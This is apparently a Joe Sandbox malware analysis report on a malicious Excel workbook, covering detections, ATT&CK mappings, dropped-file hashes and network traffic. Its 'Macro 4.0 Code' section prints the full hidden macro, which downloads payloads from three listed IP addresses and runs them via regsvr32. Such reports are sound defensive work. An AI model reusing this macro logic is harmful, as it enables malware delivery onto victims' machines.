Windows Analysis Report ClaimCopy-355714047-12022021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Jbx Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Source: | TCP traffic: | (2 entries, values not extracted) |
Source: | HTTP traffic detected: | (2 entries, values not extracted) |
Source: | IP Address: | (3 entries, values not extracted) |
Source: | TCP traffic detected without corresponding DNS query: | (36 entries, values not extracted) |
Source: | String found in binary or memory: | (3 entries, values not extracted) |
Source: | HTTP traffic detected: | (2 entries, values not extracted) |
Source: | String found in binary or memory: | (21 entries, values not extracted) |
Source: | File created: |
Source: | HTTP traffic detected: | (2 entries, values not extracted) |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | (3 entries, values not extracted) |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | Macro extractor: | (2 entries, values not extracted) |
Source: | Code function: | 0_2_02197820 |
Source: | Code function: | 0_2_02196753 |
Source: | Code function: | 0_2_02196340 |
Source: | Code function: | 0_2_02196743 |
Source: | Code function: | 0_2_021966F3 |
Source: | Code function: | 0_2_021966E8 |
Source: | Virustotal: |
Source: | Key opened: |
Source: | Process created: | (13 entries, command lines not extracted) |
Source: | Binary or memory string: |
Source: | File created: | (2 entries, paths not extracted) |
Source: | Classification label: |
Source: | File read: |
Source: | Window detected: |
Source: | Initial sample: | (4 entries, values not extracted) |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | (16 entries, values not extracted) |
Source: | Thread sleep time: | (3 entries, values not extracted) |
Source: | Binary or memory string: | (3 entries, values not extracted) |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | System Information Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
ClaimCopy-355714047-12022021.xlsb | 10% | Virustotal | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
3 URLs (not extracted) | 0% | URL Reputation | safe |
9 URLs (not extracted) | 0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
(URL not extracted) | false | | unknown |
(URL not extracted) | false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
7 URLs (not extracted) | | false | | high |
8 URLs (not extracted) | | false | | unknown |
2 URLs (not extracted) | | false | | low |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false |
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false |
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532933 |
Start date: | 02.12.2021 |
Start time: | 20:48:05 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 13s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ClaimCopy-355714047-12022021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 14 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
20:51:17 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated samples (name / SHA-256 not extracted) | Detection |
---|---|---|
45.142.211.62 | 5 | malicious |
158.69.133.78 | 5 | malicious |
185.82.126.78 | 5 | malicious |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated samples (name / SHA-256 not extracted) | Detection |
---|---|---|
RACKTECHRU | 20 | malicious |
MAKONIXLV | 20 | malicious |
OVHFR | 20 | malicious |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99428 |
Entropy (8bit): | 7.830390761754352 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUBy:I3c6EehCfCZpUHKGXbBKsiiv |
MD5: | DE0865E59F5EB8038E646D9789819DD6 |
SHA1: | 094D57774070BACAAA69C3A6BDCFA2B9743301AA |
SHA-256: | 34787D413A8BDB2B87D671E22E5C648AFD41C8B4E7E10BE09E6D2D827CED6AD8 |
SHA-512: | 7A5542ADC0BEADFE3118BFDDE11D7153153E8AC6DEC48F5A7838A73E87F1BE1F8ADF2B8868139B47E8D717F1CD7972A2D88E691B525357BC0F2D15C00A2F31AA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99428 |
Entropy (8bit): | 7.830390761754352 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUBy:I3c6EehCfCZpUHKGXbBKsiiv |
MD5: | DE0865E59F5EB8038E646D9789819DD6 |
SHA1: | 094D57774070BACAAA69C3A6BDCFA2B9743301AA |
SHA-256: | 34787D413A8BDB2B87D671E22E5C648AFD41C8B4E7E10BE09E6D2D827CED6AD8 |
SHA-512: | 7A5542ADC0BEADFE3118BFDDE11D7153153E8AC6DEC48F5A7838A73E87F1BE1F8ADF2B8868139B47E8D717F1CD7972A2D88E691B525357BC0F2D15C00A2F31AA |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.831014482033694 |
TrID: |
|
File name: | ClaimCopy-355714047-12022021.xlsb |
File size: | 99677 |
MD5: | 1f51fa867f5bbce3ab1cc40bf75f7f9b |
SHA1: | 2c690539b53f4db35af92e2b88880c3d76fcd323 |
SHA256: | f3dc3443c7ba185b1c8eff63807384e9bb6734fa0774d9964213dd9baf3fb3c3 |
SHA512: | cf98c415cee36aa57815e5f0b2a0708ca7035ec34c46848cc47fb07859d013f5f9c5651d32478a2fe4ef62730cf450570d28ae18ec884a8a0612e739a37e8f84 |
SSDEEP: | 1536:rMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:/c6EehCfCZpUHKGXbBKsiiOp |
File Content Preview: | PK..........!...~.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-355714047-12022021.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx")
23,6,=HALT()

1,1,523
4,9,34543 4,12,43
5,2,ui 5,9,7 5,14,43
6,14,36
7,0,ug 7,1,еу5цу5
8,9,34 8,10,5
9,1,y 9,16,346
10,7,rt 10,8,345 10,9,u
11,2,23 11,7,ertertyh57s5ry 11,11,5 11,12,35
12,1,65 12,2,7 12,9,r67
13,2,mfy 13,7,65 13,10,7 13,14,34 13,15,543
14,0,uh 14,1,y
15,0,7 15,7,65 15,10,ae46
16,2,d7 16,3,uRl
17,3,="Mon" 17,9,dt 17,10,6 17,12,u 17,13,5
18,3,="URLDownloadTo" 18,8,yu 18,10,sb 18,14,5
19,3,="JJCCBB" 19,7,f
20,0,7 20,1,7 20,4,185.82.126.78/ 20,7,523 20,8,u
21,0,md 21,4,158.69.133.78/ 21,6,=RANDBETWEEN(142536473,988879789754) 21,9,s 21,11,m
22,1,7 22,4,45.142.211.62/ 22,6,=".dat" 22,8,6
23,4,45.142.211.62/ 23,6,=".dat2" 23,11,4 23,15,46
24,4,185.82.126.78/ 24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) 24,8,23 24,14,6 24,15,43
25,1,567 25,4,158.69.133.78/ 25,10,23 25,13,5
28,2,756
37,6,=GOTO(Tiposa1!G8)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-20:49:37.323864 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
12/02/21-20:51:44.215042 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 20:48:54.626154900 CET | 49165 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:48:57.630085945 CET | 49165 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:03.636632919 CET | 49165 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:15.637351036 CET | 49166 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:18.645231009 CET | 49166 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:24.651915073 CET | 49166 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:36.713799000 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:36.818370104 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:49:36.818533897 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:36.819761992 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:36.924511909 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:49:37.323863983 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:49:37.324137926 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:37.353714943 CET | 49168 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:49:40.362343073 CET | 49168 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:49:46.368721008 CET | 49168 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:49:58.384051085 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:01.393110991 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:07.399558067 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:19.450882912 CET | 49170 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:22.454773903 CET | 49170 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:28.461352110 CET | 49170 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:40.478084087 CET | 49171 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:42.331336975 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:50:42.331557989 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:50:43.470313072 CET | 49171 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:46.482115030 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:50:46.586806059 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:50:49.476433039 CET | 49171 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:51:01.547184944 CET | 49173 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:04.562812090 CET | 49173 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:10.569520950 CET | 49173 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:22.568156958 CET | 49174 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:25.578001022 CET | 49174 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:31.584599972 CET | 49174 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:43.609333038 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:51:43.712430000 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:51:43.712620020 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:51:43.713840008 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:51:43.816886902 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:51:44.215042114 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:51:44.215229034 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:52:44.490155935 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:52:44.593305111 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:52:44.593637943 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 20:49:36.819761992 CET | 0 | OUT | |
Dec 2, 2021 20:49:37.323863983 CET | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49175 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 20:51:43.713840008 CET | 3 | OUT | |
Dec 2, 2021 20:51:44.215042114 CET | 4 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 20:48:14 |
Start date: | 02/12/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f060000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:06 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:07 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:07 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:08 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:08 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:08 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Non-executed Functions |
---|
Function | Relevance | Instructions | Tag | Uniqueness Score |
---|---|---|---|---|
021966F3 | .8 | 775 | COMMON | -1.00% |
021966E8 | .8 | 763 | COMMON | -1.00% |
02196753 | .8 | 757 | COMMON | -1.00% |
02196743 | .7 | 738 | COMMON | -1.00% |
02197820 | .5 | 514 | COMMON | -1.00% |
02196340 | .4 | 365 | COMMON | -1.00% |